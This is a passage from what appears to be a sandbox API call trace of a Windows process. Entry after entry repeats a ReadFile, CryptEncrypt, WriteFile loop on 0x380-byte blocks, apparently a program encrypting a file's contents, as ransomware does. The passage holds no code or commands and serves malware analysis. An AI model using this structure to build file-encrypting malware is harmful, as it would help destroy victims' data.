lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.018] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.018] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.018] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.019] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.019] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.019] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.019] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.019] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.019] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.020] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.020] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.020] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.020] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.020] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.020] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.020] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.020] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.020] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.020] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.021] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.021] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.021] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.021] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.021] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.021] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.022] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.022] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.022] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.022] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.022] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.022] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.023] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.023] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.023] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.023] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.023] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.023] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.024] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.024] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.024] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.024] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.024] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.025] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.025] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.025] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.025] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.025] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.026] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.026] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.026] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.026] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.026] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.026] ReadFile (in: hFile=0x5d4c, 